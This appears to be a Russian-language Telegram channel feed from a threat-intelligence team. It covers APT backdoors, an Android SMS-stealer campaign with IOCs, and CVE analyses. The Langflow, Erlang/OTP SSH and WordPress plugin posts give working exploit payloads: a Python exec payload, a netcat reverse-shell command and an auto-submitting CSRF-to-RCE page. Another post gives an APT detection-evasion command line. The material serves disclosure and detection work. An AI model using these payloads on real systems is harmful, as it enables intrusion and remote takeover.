Новая версия бэкдора KingOfHearts 👑
Осенью 2024 мы описали пересечения Obstinate Mogwai с другой азиатской группировкой — IAmTheKing, которая активна как минимум с 2014 года.
Последний публичный отчет об IAmTheKing выпустили эксперты «Лаборатории Касперского» в 2020 году.
А на конференции Kaspersky Security Analyst Summit 2024 подразделение PT ESC представило доклад «The Lord of PowerShell: The Return of IAmTheKing», в котором говорилось о возвращении группировки с новым стилером PowerBroker.
👀 В арсенале IAmTheKing был бэкдор KingOfHearts, который использовался злоумышленниками в атаках до 2019 года. Во время очередной попытки возвращения в инфраструктуру Obstinate Mogwai применили новую версию этого бэкдора, которую мы назвали .NET KingOfHearts.
Наша команда очень подробно проанализировала новую версию легендарного бэкдора.
Ключевые моменты:
😬 Мы обнаружили сборки в ресурсах, даты компиляции которых могут указывать, что бэкдор предположительно мог находиться в разработке с конца 2022, а в инциденте был использован в конце 2023 года.
😬 Эти же сборки помогли найти хеши нескольких других образцов
😬
😬 Нашли ряд совпадений, по которым поняли, что перед нами — новая версия бэкдора KingOfHearts.
⚡️ Все подробности — в статье.
Осенью 2024 мы описали пересечения Obstinate Mogwai с другой азиатской группировкой — IAmTheKing, которая активна как минимум с 2014 года.
Последний публичный отчет об IAmTheKing выпустили эксперты «Лаборатории Касперского» в 2020 году.
А на конференции Kaspersky Security Analyst Summit 2024 подразделение PT ESC представило доклад «The Lord of PowerShell: The Return of IAmTheKing», в котором говорилось о возвращении группировки с новым стилером PowerBroker.
Наша команда очень подробно проанализировала новую версию легендарного бэкдора.
Ключевые моменты:
.NET KingOfHearts с новыми C2..NET KingOfHearts, в отличие от старых версий, стал модульным.Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11⚡7🤯4👍2😁1
Критическая уязвимость CVE-2025-3248 👾
CVE-2025-3248 — уязвимость в Langflow, связанная с выполнением произвольного кода (RCE) на уязвимой конечной точке
❗️ Уязвимы все версии до 1.3.0. Рекомендуем обновиться.
Метрики
Полезная нагрузка
Разберем детальнее:
На что важно обратить внимание
1️⃣ Из-за того, что на конечной точке
2️⃣ Код будет выполнен на сервере — это позволяет атакующему осуществить произвольные команды, например, вывести список файлов на сервере или даже изменить состояние системы.
3️⃣ Код может представлять из себя все что угодно, он не обязательно должен соответствовать примеру выше.
Как защититься
✅ Ограничить доступ из сети интернет к данному API.
✅ Написать правило, блокирующее POST-запросы к уязвимому URL, содержащее заголовок
CVE-2025-3248 — уязвимость в Langflow, связанная с выполнением произвольного кода (RCE) на уязвимой конечной точке
/api/v1/validate/code. Langflow — инструмент с открытым исходным кодом, предназначенный для создания и управления потоками работы с использованием моделей искусственного интеллекта.
Метрики
Base score: 9,8
CWE: 306
Полезная нагрузка
{
"code": """
def test(cd=exec('raise Exception(__import__("subprocess").check_output("ls -la", shell=True))')):
pass
"""
}Разберем детальнее:
codeexec() — позволяет выполнять строки кода Python;subprocess.check_output("ls -la", shell=True) — эта команда выполняет системную команду ls -la через оболочку (shell). В результате возвращается список файлов и директорий в текущем каталоге;raise Exception(...) — исключение, которое вызывается после выполнения команды ls -la.На что важно обратить внимание
/api/v1/validate/code нет аутентификации, злоумышленник может отправить такой код через HTTP-запрос.Как защититься
Content-Type: application/json и тело, в котором присутствуют python-операторы — например, exec, Exception, import, print, system.Please open Telegram to view this post
VIEW IN TELEGRAM
👍10⚡6😱5
Интересный C2 .NET KingOfHearts 👀
В инциденте с новой версией бэкдора KingOfHearts группировки Obstinate Mogwai фигурировал C2-сервер
В конце 2023 года эксперты одной зарубежной компании предположили, что этот C2 связан с Иранской APT-группировкой MuddyWater. Адрес был помечен как «Suspected MuddyC2Go (2023)», но авторы указали, что не обнаружили у подозрительного C2 вредоносной активности или известных шаблонов URL фреймворка
Статью выпустили 8 ноября 2023 года, а в нашем инциденте бэкдор
Принадлежал ли сервер
P.S. Знаем, что сейчас 2025 год, но наш ресерчер очень хотел поделиться этой информацией с комьюнити :)
В инциденте с новой версией бэкдора KingOfHearts группировки Obstinate Mogwai фигурировал C2-сервер
45.150.64.23.В конце 2023 года эксперты одной зарубежной компании предположили, что этот C2 связан с Иранской APT-группировкой MuddyWater. Адрес был помечен как «Suspected MuddyC2Go (2023)», но авторы указали, что не обнаружили у подозрительного C2 вредоносной активности или известных шаблонов URL фреймворка
MuddyC2Go. Статью выпустили 8 ноября 2023 года, а в нашем инциденте бэкдор
.NET KingOfHearts с аналогичным C2 использовался 14 ноября 2023. Принадлежал ли сервер
45.150.64.23 сначала MuddyWater, а потом перешел к Obstinate Mogwai — неизвестно. Возможно, эксперты ошибочно отнесли этот C2 к MuddyWater, хотя изначально он никак не был связан с этой группировкой.Please open Telegram to view this post
VIEW IN TELEGRAM
🫡11🔥10👾6🤔2🤨2👍1
Очередная кампания по рассылке Android-вредоносов в Telegram ✈️
Рассылка началась ориентировочно в конце марта и продолжается до сих пор. Вредонос сопровождается сообщениями, которые склоняют жертву к немедленному запуску мимикрирующего под фото или видео APK-файла (Скриншот 1).
По функционалу распространяемый вредонос похож на
Мы считаем, что обнаружили одну из новых вариаций этого ВПО. Она тоже работает с SMS:
— эксфильтрует последние 14480 SMS-сообщений;
— эксфильтрует информацию о зараженном устройстве, установленных приложениях банков, мессенджеров, маркетплейсов и «Госуслуг», а также содержимое буфера обмена;
— регистрирует себя как приложение для приема SMS по умолчанию и перенаправляет на сервер управления SMS-сообщениями от Telegram.
Особенности вредоноса
💣 После запуска ВПО сначала получает конфигурацию воркера со специального сервера конфигураций. В конфигурации указаны: команда, имя и telegram handle воркера, номер телефона как резервный канал получения уведомлений о заражениях.
💣 Из собранных конфигураций мы обнаружили 10 серверов управления для эксфильтрации SMS.
💣 Во всех конфигурациях используются одинаковые параметры AES-шифрования. В начале кампании использовался один и тот же номер телефона для перенаправления SMS, но в последних образцах стали появляться новые.
💣 После заражения злоумышленники получают возможность отправлять SMS от имени жертвы на заданный номер по команде. Команда приходит в специально сформированном входящем SMS (Скриншот 2).
💣 Злоумышленники работают оперативно — после заражения очередной жертвы уже через 13 минут злоумышленники рассылали ВПО всем контактам в Telegram.
Мы предполагаем, что на телефоне злоумышленников из конфигурации установлено аналогичное ВПО, которое обрабатывает такие SMS и POST-запросом отправляет данные жертвы и воркера на сервер управления команды.
Такая схема может позволить получать данные о зараженной жертве, даже если на телефоне жертвы не будет интернета, а серверы управления ВПО заблокируют (Скриншот 3).
Как защититься
Если вы стали жертвой, нужно найти приложение и удалить его из списка установленных. Обычно имя вредоносного приложения совпадает с именем присланного apk-файла (Скриншот 4).
IOC
md5:
Имена apk-файлов:
Сервер конфигураций воркеров:
C2-серверы команд:
Рассылка началась ориентировочно в конце марта и продолжается до сих пор. Вредонос сопровождается сообщениями, которые склоняют жертву к немедленному запуску мимикрирующего под фото или видео APK-файла (Скриншот 1).
По функционалу распространяемый вредонос похож на
PhotoAndroidMalware, о котором недавно сообщили коллеги из F6. Мы считаем, что обнаружили одну из новых вариаций этого ВПО. Она тоже работает с SMS:
— эксфильтрует последние 14480 SMS-сообщений;
— эксфильтрует информацию о зараженном устройстве, установленных приложениях банков, мессенджеров, маркетплейсов и «Госуслуг», а также содержимое буфера обмена;
— регистрирует себя как приложение для приема SMS по умолчанию и перенаправляет на сервер управления SMS-сообщениями от Telegram.
Особенности вредоноса
Мы предполагаем, что на телефоне злоумышленников из конфигурации установлено аналогичное ВПО, которое обрабатывает такие SMS и POST-запросом отправляет данные жертвы и воркера на сервер управления команды.
Такая схема может позволить получать данные о зараженной жертве, даже если на телефоне жертвы не будет интернета, а серверы управления ВПО заблокируют (Скриншот 3).
Как защититься
Если вы стали жертвой, нужно найти приложение и удалить его из списка установленных. Обычно имя вредоносного приложения совпадает с именем присланного apk-файла (Скриншот 4).
IOC
md5:
31210d375856bee724080f69b4c5e81a
8955c7ee6b1b6adc50838a0b7e6c7b6f
8a602991a6fdc161cdb6763871346f99
33f2215163e708a2453e166c4f110c47
7f5f91b0e1a2320655d103cbdda5ebdf
c80574ce2840120608f2026507710062
9931eb52878c5957251014b750bb781c
32c22d0fe9b8afb65e405165694a6bd5
2d05bc8a1a38517e2abd3183e3c6923e
09f829e6b4e32751dbc9a776cce0f902
Имена apk-файлов:
Архив фото (88).apk
Mega видео (Архив).apk
Фoт0(4)9_0.4_2025.apk
Яндekc Buдeo.apk
Документы (3).apk
Video.1)1.226293.apk
YandexDisc.apk
Фото (53 шт.).apk
Сервер конфигураций воркеров:
http://185.100.157.190:8000
C2-серверы команд:
http://89.23.101.185:120
http://89.23.102.98:120
http://89.23.102.238:120
http://91.92.46.212:120
http://91.92.46.228:120
http://185.177.239.24:100
http://185.177.239.24:120
http://185.100.157.82:120
http://185.100.157.227:100
http://185.100.157.237:120
http://193.68.89.199:120
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥13👍12👾4❤2🤡1
Советы пентестерам на 2025 год 🚩
Наша OffSec-команда выпустила отчет о ключевых уязвимостях инфраструктур российских компаний в 2024 году. Повторяться не будем — сконцентрируемся на трендах в пентесте, которые могут быть актуальны в 2025.
😬 Проверяйте CMS
Все еще обнаруживаются уязвимости в функциональности
😬 Импортозамещение может быть уязвимым
Наши эксперты все чаще исследуют безопасность российских аналогов зарубежных сервисов. Разработчики не всегда успевают провести оценку безопасности приложения или системы, поэтому обнаруживается много изъянов и в базах данных, и в логике процессов приложений.
😬 Классические проблемы с паролями
Пароли по умолчанию, слабые парольные политики и переиспользование паролей остаются проблемой в российских организациях. Обстоятельная разведка аутентификационных данных в открытых источниках перед пентестом — приличная часть работы, которую OffSec-эксперты регулярно делали в прошлом году.
Разведка позволяет собрать учетные записи и пароли еще до старта пентеста и потом использовать эти данные, применяя технику password spraying на инфраструктуре, которую надо проверить. Для поиска секретов наши эксперты рекомендуют использовать Trufflehog.
😬 Готовимся к атакам на Active Directory и FreeIPA
Во внутренней части инфраструктур в топе атак на AD стоит ESC. В 2024 году наши пентестеры начали замечать, что многие организации переходят на FreeIPA-решения. Они, как и импортозамещающие продукты, содержат немало изъянов. Эксперты советуют обратить на FreeIPA внимание и начать готовиться к атакам на нее.
Наша OffSec-команда выпустила отчет о ключевых уязвимостях инфраструктур российских компаний в 2024 году. Повторяться не будем — сконцентрируемся на трендах в пентесте, которые могут быть актуальны в 2025.
Все еще обнаруживаются уязвимости в функциональности
vote популярной CMS-системы 1С Bitrix и ее производных. Эксперты советуют перечитать работу исследователя cr1f о безопасности Bitrix и не вычеркивать ее из своих сплойтов. А еще — не забывать фаззить Bitrix специализированными словарями.Наши эксперты все чаще исследуют безопасность российских аналогов зарубежных сервисов. Разработчики не всегда успевают провести оценку безопасности приложения или системы, поэтому обнаруживается много изъянов и в базах данных, и в логике процессов приложений.
Пароли по умолчанию, слабые парольные политики и переиспользование паролей остаются проблемой в российских организациях. Обстоятельная разведка аутентификационных данных в открытых источниках перед пентестом — приличная часть работы, которую OffSec-эксперты регулярно делали в прошлом году.
Разведка позволяет собрать учетные записи и пароли еще до старта пентеста и потом использовать эти данные, применяя технику password spraying на инфраструктуре, которую надо проверить. Для поиска секретов наши эксперты рекомендуют использовать Trufflehog.
Во внутренней части инфраструктур в топе атак на AD стоит ESC. В 2024 году наши пентестеры начали замечать, что многие организации переходят на FreeIPA-решения. Они, как и импортозамещающие продукты, содержат немало изъянов. Эксперты советуют обратить на FreeIPA внимание и начать готовиться к атакам на нее.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍13🤔5👏2👾2
Десятибалльная уязвимость CVE-2025-32433 👾
CVE-2025-32433 — Remote Code Execution-уязвимость в SSH-серверах на базе Erlang/OTP, которая позволяет получить несанкционированный доступ к уязвимым системам и выполнять произвольные команды без аутентификации.
Метрики
Уязвимы версии
Как происходит атака
По стандарту канал для выполнения команд SSH-клиентом открывается после прохождения аутентификации, в противном случае сообщение будет отвергнуто или приведет к разрыву соединения.
Но уязвимые версии
Из чего состоит эксплоит
Эксплоит может состоять из четырёх клиентских SSH-пакетов после установления TCP-соединения.
1️⃣ Обмен баннерами. Клиент отправляет строку, сервер отвечает своей:
2️⃣ Инициализация обмена ключами:
3️⃣ Отправка SSH-пакета типа
4️⃣ Запрос на выполнение команды:
Пример выполнения CVE-2025-32433
Для примера отправим пакет, содержащий команду создания и выполнения Reverse Shell-кода, для получения контроля над уязвимым сервером:
Как детектировать и защититься
Важно следить, что сообщения типов
Для написания IDS-сигнатур можно обратить внимание на структуру таких сообщений:
Содержимое полей
❗️ Настоятельно советуем обновиться до последних версий, а до этого ограничить доступ к SSH.
CVE-2025-32433 — Remote Code Execution-уязвимость в SSH-серверах на базе Erlang/OTP, которая позволяет получить несанкционированный доступ к уязвимым системам и выполнять произвольные команды без аутентификации.
Метрики
Base Score: 10.0 CRITICAL
CWE-306
Уязвимы версии
<= OTP-27.3.2
<= OTP-26.2.5.10
<= OTP-25.3.2.19
Как происходит атака
По стандарту канал для выполнения команд SSH-клиентом открывается после прохождения аутентификации, в противном случае сообщение будет отвергнуто или приведет к разрыву соединения.
Но уязвимые версии
Erlang/OTP могут не проверять стадию аутентификации и обрабатывать CHANNEL_OPEN и exec сразу. Это приводит к тому, что для выполнения команд на сервере злоумышленникам достаточно иметь сетевой доступ к нему.Из чего состоит эксплоит
Эксплоит может состоять из четырёх клиентских SSH-пакетов после установления TCP-соединения.
s.sendall(b"SSH-2.0-OpenSSH_8.9\r\n")
banner = s.recv(1024)
kex_packet = build_kexinit()
s.sendall(pad_packet(kex_packet))
SSH_MSG_CHANNEL_OPEN с «просьбой» открыть канал, как будто клиент уже прошел аутентификацию:chan_open = build_channel_open()
s.sendall(pad_packet(chan_open))
chan_req = build_channel_request(
command='file:write_file("/lab.sh", <<"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.0.22 8080 >/tmp/f">>), os:cmd("chmod +x /lab.sh"), os:cmd("/lab.sh").'
)
s.sendall(pad_packet(chan_req))
Пример выполнения CVE-2025-32433
Для примера отправим пакет, содержащий команду создания и выполнения Reverse Shell-кода, для получения контроля над уязвимым сервером:
file:write_file("/lab.sh", <<COMAND>>), os:cmd("chmod +x /lab.sh"), os:cmd("/lab.sh").
file:write_file("/lab.sh,<<COMAND>>)os:cmd("chmod +x /lab.sh") — предоставит права на выполнение;os:cmd("/lab.sh") — запустит Reverse Shell.Как детектировать и защититься
Важно следить, что сообщения типов
MSG_CHANNEL_OPEN и MSG_CHANNEL_REQUEST не передаются в открытом виде в сетевом трафике. Согласно RFC 4253 и 4254, обмен такими сообщениями осуществляется после обмена ключами и аутентификации в зашифрованном виде. Для написания IDS-сигнатур можно обратить внимание на структуру таких сообщений:
byte SSH_MSG_CHANNEL_OPEN # значение 0x5a
string "session"
uint32 sender channel
uint32 initial window size
uint32 maximum packet size
byte SSH_MSG_CHANNEL_REQUEST # значение 0x62
uint32 recipient channel
string "exec"
boolean want reply
string command
Содержимое полей
string может меняться в зависимости от типа, а приведенные выше session и exec соответствуют запросам на открытие канала и выполнение команды. Появление в сетевом трафике SSH в открытом виде таких сообщений может свидетельствовать о попытках эксплуатации уязвимости.Please open Telegram to view this post
VIEW IN TELEGRAM
🔥15🫡7⚡3❤2🌚1
Критическая уязвимость CVE-2025–39601 👾
CSRF-атаки все еще актуальны, особенно если мы говорим про плагины к популярным CMS. Сегодня расскажем, к чему они могут привести, на примере CVE-2025–39601.
CVE-2025–39601 — уязвимость подделки межсайтовых запросов (CSRF) в плагине WPFactory Custom CSS, JS и PHP для WordPress.
❗️ Уязвимы все версии до 2.4.1, рекомендуем обновиться.
Метрики
Как это работает
После установки плагина
В передаваемых данных при создании скрипта отсутствует CSRF-токен, нет и отдельного HTTP-заголовка или значения COOKIE, содержащего токен. Этот запрос можно будет подделать и создать скрипт от лица администратора, что приведет к RCE.
Пример
Классический сценарий атаки будет выглядеть так:
Вредоносное приложение имеет такую HTML-структуру:
Код передается в блоке
Этот POST-запрос будет полностью эмулировать легитимный запрос администратора, и только заголовок
Как защищаться
1️⃣ Не отсылать или ограничить отсылку COOKIE файлов сторонним сайтам или приложениям;
2️⃣ использовать CORS;
3️⃣ использовать CSRF-токен;
4️⃣ дополнительно проверять на валидность заголовки
CSRF-атаки все еще актуальны, особенно если мы говорим про плагины к популярным CMS. Сегодня расскажем, к чему они могут привести, на примере CVE-2025–39601.
CVE-2025–39601 — уязвимость подделки межсайтовых запросов (CSRF) в плагине WPFactory Custom CSS, JS и PHP для WordPress.
Метрики
Base Score: 9,6
CWE: CWE-352
Как это работает
После установки плагина
WPFactory Custom CSS, JS и PHP у администратора появляется возможность создавать собственные PHP скрипты на конечной точке /wp-admin/tools.php?page=alg-custom-php. Сам PHP код и другие параметры передаются в теле POST-запроса: alg_custom_css_php_enabled=1&alg_custom_css_php_execute=plugins_loaded&alg_custom_css_php=<?php system(id); ?>&alg_ccjp_submit=php
В передаваемых данных при создании скрипта отсутствует CSRF-токен, нет и отдельного HTTP-заголовка или значения COOKIE, содержащего токен. Этот запрос можно будет подделать и создать скрипт от лица администратора, что приведет к RCE.
Пример
Классический сценарий атаки будет выглядеть так:
Администратор получает вредоносную ссылку на приложение -> администратор переходит по ссылке -> от лица администратора создаётся скрипт с вредоносным кодом, который приводит к RCE.
Вредоносное приложение имеет такую HTML-структуру:
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>WordPress Custom CSS, JS & PHP plugin <= 2.4.1 - CSRF to RCE vulnerability </title>
</head>
<body onload="document.forms[0].submit()">
<h1>CSRF PoC - WordPress Custom CSS, JS & PHP plugin <= 2.4.1 </h1>
<form action="http://XXX/wp-admin/tools.php?page=alg-custom-php" method="POST">
<input type="hidden" name="alg_custom_css_php_enabled" value="1">
<input type="hidden" name="alg_custom_css_php" value="<?php system('id'); ?>">
<input type="hidden" name="alg_ccjp_submit" value="php">
<noscript>
<input type="submit" value="Submit">
</noscript>
</form>
</body>
</html>
Код передается в блоке
alg_custom_css_php. В данном случае, для примера, мы выведем результат команды id, который сможет увидеть любой пользователь приложения (Скриншот 1).Этот POST-запрос будет полностью эмулировать легитимный запрос администратора, и только заголовок
Origin будет содержать информацию о другом приложении (Скриншот 2).Как защищаться
Origin, Referer.Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11👨💻6👍5👾2❤1🤔1
Веб-панель Bulldog Backdoor — главный инструмент Shedding Zmiy 🐍
Исследуя инфраструктуру группировки Shedding Zmiy, мы обнаружили в открытом доступе веб-панель Bulldog Backdoor. Фронтенд написан с помощью фреймворка
Проанализировав панель, наша команда поняла подходы Shedding Zmiy к построению части своей C2-инфраструктуры. Это пролило свет на экосистему имплантов и их связи, а также на механизмы работы Bulldog Backdoor.
Веб-панель Bulldog Backdoor помогает Shedding Zmiy
💣 Генерировать новые импланты для Bulldog Backdoor и beacon’ы других типов.
💣 Управлять активными сессиями в сети жертвы.
💣 Передавать команды отложенного исполнения — вероятно, для имитации активности в разных часовых поясах.
💣 Собирать подробную статистику по сессиям: активным, завершённым, потерянным.
💣 Просматривать интерактивную карту зараженной инфраструктуры в режиме реального времени (Скриншот 2 — так она могла бы выглядеть).
💣 Работать с данными на разных уровнях абстракции за счет многоуровневой системы сущностей — «Цель», «Хост» и др.
💣 Осуществлять автоматизированный брутфорс на основе собранных учетных данных.
💣 Легко передавать критически важную информацию между операторами с помощью системы заметок для целей и хостов с поддержкой Markdown (Скриншот 3 — пример заметки).
🔗 Полный технический разбор веб-панели Bulldog Backdoor версии
Исследуя инфраструктуру группировки Shedding Zmiy, мы обнаружили в открытом доступе веб-панель Bulldog Backdoor. Фронтенд написан с помощью фреймворка
React.js с использованием TypeScript. Мы смогли выгрузить исходный код компонентов в первозданном виде (Скриншот 1 — структура проекта).Проанализировав панель, наша команда поняла подходы Shedding Zmiy к построению части своей C2-инфраструктуры. Это пролило свет на экосистему имплантов и их связи, а также на механизмы работы Bulldog Backdoor.
Веб-панель Bulldog Backdoor — ключевой элемент экосистемы группировки:
— Агрегирует данные, полученные в ходе атак.
— Служит интерфейсом управления активными операциями.
— Помогает централизованно контролировать всю сеть зараженных систем.
Веб-панель Bulldog Backdoor помогает Shedding Zmiy
v0.1.15 читайте в нашей новой статье.Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥14👍12❤4👾2
Уязвимость виртуальной машины «Битрикс» в арсенале Shedding Zmiy ⚡️
Недавно ФСТЭК России распространила уведомление об уязвимости BDU:2025-04539 в сервере «1С-Битрикс: Виртуальная машина». Из-за недостатков в разграничении прав доступа атакующие могли поднимать свои права на скомпрометированном сервере до
Наша команда обнаружила эту уязвимость, когда анализировала утилитудля размещения на атакованном сервере бэкдора с функциональностью получения root-привилегий.
Уязвимость заключается в неправильной конфигурации доступов для пользователя bitrix.
😬 Пользователь имел доступ к настройкам веб-серверов
😬 Собрав вредоносный модуль и изменив настройки веб-сервера, злоумышленники могли повысить свои привилегии до уровня
😬 Мы нашли дополнительные ошибки в конфигурации доступа файлов служб Linux, используемых в виртуальной машине. Они позволяли внедрить произвольный код в скрипт службы и исполнить его от пользователя
Обнаружив уязвимость, мы сразу же сообщили о ней вендору. Патч, закрывающий уязвимость, уже доступен на сайте. Если ещё не обновились — сейчас самое время!
Недавно ФСТЭК России распространила уведомление об уязвимости BDU:2025-04539 в сервере «1С-Битрикс: Виртуальная машина». Из-за недостатков в разграничении прав доступа атакующие могли поднимать свои права на скомпрометированном сервере до
root.Наша команда обнаружила эту уязвимость, когда анализировала утилиту
Install — один из вредоносных инструментов группировки Shedding Zmiy. Его атакующие могли использовать Уязвимость заключается в неправильной конфигурации доступов для пользователя bitrix.
Apache и Nginx. root.root.Обнаружив уязвимость, мы сразу же сообщили о ней вендору. Патч, закрывающий уязвимость, уже доступен на сайте. Если ещё не обновились — сейчас самое время!
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥13👍4❤3🤔1👾1
Как Erudite Mogwai обходит правила детектирования 👣
Уже в нескольких кейсах мы видим, как группировка Erudite Mogwai (или Space Pirates) при боковом перемещении использует один и тот же паттерн выполнения команд:
Если атакующие выполняют команды с использованием задач (
Зачем Erudite Mogwai используют такой паттерн
💣 Некоторые средства АВПО неправильно обрабатывают этот командлайн, в журналах оказывается лишь
💣 Если правила детектирования подозрительных запусков командной оболочки используют полный путь к
💣 После выполнения
Вывод команды whoami — SANDBOX\User.
Но есть и хорошие новости
👀 Логирование процессов Event ID 4688 в журнале Windows Security обрабатывает командлайн корректно.
👀 Паттерн команды приметный, и аналитик наверняка засомневается в его легитимности.
👀 Иногда атакующие забывают удалить файл с выводом
👀 Можно быстро обнаружить значительную часть активности атакующих, грепнув по диску
Используйте эту информацию при написании детектов.
Удачной охоты!👀
Уже в нескольких кейсах мы видим, как группировка Erudite Mogwai (или Space Pirates) при боковом перемещении использует один и тот же паттерн выполнения команд:
C:\Windows\System32\calc.exe..\..\cmd.exe /C <COMMAND> > C:\Users\Public\<OUTPUT_NAME> 2>&1 & certutil -f -encode C:\Users\Public\<OUTPUT_NAME> C:\Users\Public\<OUTPUT_NAME> 2>&1
<COMMAND><OUTPUT_NAME> — имя файла, где будет сохранен вывод команды, закодированный в Base64 с помощью certutil. Обычно оно соответствует регулярному выражению [A-z]{8}.log.Если атакующие выполняют команды с использованием задач (
AtExec), то имя задачи обычно соответствует имени файла <OUTPUT_NAME>, но без расширения.Зачем Erudite Mogwai используют такой паттерн
certutil -f -encode C:\Users\Public\<OUTPUT_NAME> C:\Users\Public\<OUTPUT_NAME> 2>&1. Это затрудняет исследование активности.cmd, например C:\Windows\System32\cmd.exe /C — то они не сработают. Аналогично с правилами детектирования АВПО.certutil файл с выводом команды будет менее понятным для неподготовленного администратора:-----BEGIN CERTIFICATE-----
U0FOREJPWFxVc2Vy
-----END CERTIFICATE-----
Но есть и хорошие новости
C:\Users\Public\<OUTPUT_NAME>. Так можно найти системы, где уже побывал Erudite Mogwai.calc.exe..\..\cmd.exe, в том числе в неразмеченном пространстве.Используйте эту информацию при написании детектов.
Удачной охоты!
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥17👾6❤4👀3💩1
Инструменты Shedding Zmiy в веб-панели Bulldog Backdoor
Генерация новых имплантов в веб-панели не ограничена одним Bulldog Backdoor. Она объединяет в себе многие инструменты группировки Shedding Zmiy.
В исходном коде мы обнаружили упоминание девяти типов beacon'ов (Скриншот 1):
— gecko;
— revshell;
— proxy;
— teardrop;
— gwyntyk;
— gsnetcat;
— puma;
— mycelium;
— mushroom.
Некоторые из них — ранее не документированные. Но есть и узнаваемые: например, имплант puma, о котором у нас есть отдельная статья.
Интересные факты о веб-панели Bulldog Backdoor🔎
1️⃣ Встроенная поддержка модулей Bulldog Backdoor
В панели есть категория имплантов bb, включающая bb-shell, bb-custom, и отдельная категория collector (Скриншот 2).
Судя по коду, bb — это бинарь-обертка, объединяющий несколько модулей: collector, revshell, proxy, gecko (Скриншот 3). Вариант bb-custom позволяет оператору выбрать, какие именно компоненты должны быть включены в финальный исполняемый файл — через специальное поле
2️⃣ Среди имплантов есть gsnetcat
Еще он встречается на странице Remote sessions. Эта страница в веб-панели до сих пор имеет путь
Это наследие старых версий. Вероятно, раньше эта вкладка была связанна только с gsnetcat, но ее забыли или не захотели переименовывать.
3️⃣ Вкладка Patched bins на странице Target host (Скриншот 4)
Мы полагаем, что она отображает подменные легитимные исполняемые файлы — излюбленная техника группировки Shedding Zmiy.
👍 Подробнее о веб-панели Bulldog Backdoor — в нашем исследовании.
Генерация новых имплантов в веб-панели не ограничена одним Bulldog Backdoor. Она объединяет в себе многие инструменты группировки Shedding Zmiy.
В исходном коде мы обнаружили упоминание девяти типов beacon'ов (Скриншот 1):
— gecko;
— revshell;
— proxy;
— teardrop;
— gwyntyk;
— gsnetcat;
— puma;
— mycelium;
— mushroom.
Некоторые из них — ранее не документированные. Но есть и узнаваемые: например, имплант puma, о котором у нас есть отдельная статья.
Интересные факты о веб-панели Bulldog Backdoor
В панели есть категория имплантов bb, включающая bb-shell, bb-custom, и отдельная категория collector (Скриншот 2).
Судя по коду, bb — это бинарь-обертка, объединяющий несколько модулей: collector, revshell, proxy, gecko (Скриншот 3). Вариант bb-custom позволяет оператору выбрать, какие именно компоненты должны быть включены в финальный исполняемый файл — через специальное поле
Parts в интерфейсе генерации.Еще он встречается на странице Remote sessions. Эта страница в веб-панели до сих пор имеет путь
/ui/gs-netcat, а соответствующий ей React-компонент называется NetcatTablePage.Это наследие старых версий. Вероятно, раньше эта вкладка была связанна только с gsnetcat, но ее забыли или не захотели переименовывать.
Мы полагаем, что она отображает подменные легитимные исполняемые файлы — излюбленная техника группировки Shedding Zmiy.
Веб-панель Bulldog Backdoor — не просто интерфейс управления одним бэкдором, а многофункциональный командный центр, объединяющий весь вредоносный инструментарий Shedding Zmiy. Ее функциональность и архитектура делают ее ядром всех операций группировки, обеспечивая масштабируемость, автоматизацию и гибкость в проведении атак.
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
❤9👍9🔥9👾1